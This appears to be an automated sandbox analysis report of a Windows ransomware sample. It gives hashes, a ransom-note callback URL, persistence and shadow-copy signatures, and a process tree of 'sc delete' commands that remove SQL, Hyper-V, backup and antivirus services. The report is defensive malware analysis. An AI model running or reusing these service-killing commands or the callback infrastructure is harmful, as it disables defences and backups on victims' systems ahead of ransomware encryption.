Analysis
-
max time kernel
150s -
max time network
81s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-04-2021 07:53
Static task
static1
Behavioral task
behavioral1
Sample
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
Resource
win10v20210408
General
-
Target
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
-
Size
242KB
-
MD5
c5d02a59e543e126359998b982e87d45
-
SHA1
e6960b254e0215493a29471949b1ff84b6da1b59
-
SHA256
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51
-
SHA512
6fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721
Malware Config
Extracted
C:\Users\Admin\AppData\Roaming\!files-recovery.txt
http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=BAT847R6DTUBSX
Extracted
C:\Users\Public\Videos\Sample Videos\!files-recovery.txt
http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=RORLGF2TRYJKRN
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 2 IoCs
Processes:
norapid.exenorapid.exepid process 3588 norapid.exe 3120 norapid.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exenorapid.exenorapid.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\HelloAV = "C:\\Users\\Admin\\AppData\\Roaming\\norapid.exe" 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt" 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt" norapid.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt" norapid.exe -
Drops desktop.ini file(s) 18 IoCs
Processes:
norapid.exedescription ioc process File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini norapid.exe File opened for modification C:\Users\Public\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Searches\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini norapid.exe File opened for modification C:\Users\Public\Downloads\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Videos\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini norapid.exe File opened for modification C:\Users\Public\Videos\desktop.ini norapid.exe File opened for modification C:\Users\Public\Pictures\desktop.ini norapid.exe File opened for modification C:\Users\Public\Desktop\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Links\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Documents\desktop.ini norapid.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini norapid.exe File opened for modification C:\Users\Public\Libraries\desktop.ini norapid.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini norapid.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3648 schtasks.exe 3684 schtasks.exe 2376 schtasks.exe 3840 schtasks.exe 3860 schtasks.exe 3368 schtasks.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exepid process 3712 vssadmin.exe 4004 vssadmin.exe 2980 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exepid process 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exenorapid.exenorapid.exepid process 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe 3588 norapid.exe 3120 norapid.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
vssvc.exeWMIC.exeWMIC.exeWMIC.exedescription pid process Token: SeBackupPrivilege 3832 vssvc.exe Token: SeRestorePrivilege 3832 vssvc.exe Token: SeAuditPrivilege 3832 vssvc.exe Token: SeIncreaseQuotaPrivilege 3816 WMIC.exe Token: SeSecurityPrivilege 3816 WMIC.exe Token: SeTakeOwnershipPrivilege 3816 WMIC.exe Token: SeLoadDriverPrivilege 3816 WMIC.exe Token: SeSystemProfilePrivilege 3816 WMIC.exe Token: SeSystemtimePrivilege 3816 WMIC.exe Token: SeProfSingleProcessPrivilege 3816 WMIC.exe Token: SeIncBasePriorityPrivilege 3816 WMIC.exe Token: SeCreatePagefilePrivilege 3816 WMIC.exe Token: SeBackupPrivilege 3816 WMIC.exe Token: SeRestorePrivilege 3816 WMIC.exe Token: SeShutdownPrivilege 3816 WMIC.exe Token: SeDebugPrivilege 3816 WMIC.exe Token: SeSystemEnvironmentPrivilege 3816 WMIC.exe Token: SeRemoteShutdownPrivilege 3816 WMIC.exe Token: SeUndockPrivilege 3816 WMIC.exe Token: SeManageVolumePrivilege 3816 WMIC.exe Token: 33 3816 WMIC.exe Token: 34 3816 WMIC.exe Token: 35 3816 WMIC.exe Token: SeIncreaseQuotaPrivilege 3792 WMIC.exe Token: SeSecurityPrivilege 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 3792 WMIC.exe Token: SeLoadDriverPrivilege 3792 WMIC.exe Token: SeSystemProfilePrivilege 3792 WMIC.exe Token: SeSystemtimePrivilege 3792 WMIC.exe Token: SeProfSingleProcessPrivilege 3792 WMIC.exe Token: SeIncBasePriorityPrivilege 3792 WMIC.exe Token: SeCreatePagefilePrivilege 3792 WMIC.exe Token: SeBackupPrivilege 3792 WMIC.exe Token: SeRestorePrivilege 3792 WMIC.exe Token: SeShutdownPrivilege 3792 WMIC.exe Token: SeDebugPrivilege 3792 WMIC.exe Token: SeSystemEnvironmentPrivilege 3792 WMIC.exe Token: SeRemoteShutdownPrivilege 3792 WMIC.exe Token: SeUndockPrivilege 3792 WMIC.exe Token: SeManageVolumePrivilege 3792 WMIC.exe Token: 33 3792 WMIC.exe Token: 34 3792 WMIC.exe Token: 35 3792 WMIC.exe Token: SeIncreaseQuotaPrivilege 3816 WMIC.exe Token: SeSecurityPrivilege 3816 WMIC.exe Token: SeTakeOwnershipPrivilege 3816 WMIC.exe Token: SeLoadDriverPrivilege 3816 WMIC.exe Token: SeSystemProfilePrivilege 3816 WMIC.exe Token: SeSystemtimePrivilege 3816 WMIC.exe Token: SeProfSingleProcessPrivilege 3816 WMIC.exe Token: SeIncBasePriorityPrivilege 3816 WMIC.exe Token: SeCreatePagefilePrivilege 3816 WMIC.exe Token: SeBackupPrivilege 3816 WMIC.exe Token: SeRestorePrivilege 3816 WMIC.exe Token: SeShutdownPrivilege 3816 WMIC.exe Token: SeDebugPrivilege 3816 WMIC.exe Token: SeSystemEnvironmentPrivilege 3816 WMIC.exe Token: SeRemoteShutdownPrivilege 3816 WMIC.exe Token: SeUndockPrivilege 3816 WMIC.exe Token: SeManageVolumePrivilege 3816 WMIC.exe Token: 33 3816 WMIC.exe Token: 34 3816 WMIC.exe Token: 35 3816 WMIC.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exedescription pid process target process PID 788 wrote to memory of 1704 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1704 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1704 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1704 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1384 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1384 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1384 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1384 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1328 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1328 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1328 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1328 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1520 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1520 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1520 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1520 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1440 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1440 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1440 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1440 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 316 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 316 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 316 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 316 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1720 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1720 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1720 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1720 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 556 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 556 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 556 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 556 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1056 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1056 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1056 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1056 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 732 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 732 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 732 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 732 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 912 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 912 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 912 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 912 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1468 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1468 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1468 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1468 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1180 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1180 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1180 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1180 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1920 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1920 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1920 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1920 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1644 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1644 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1644 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1644 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1604 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1604 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1604 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe PID 788 wrote to memory of 1604 788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe"C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "storflt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "vmicvss"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "WRSVC"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ekrn"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klim6"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KLIF"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klpd"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klflt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klmouflt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klhk"2⤵
-
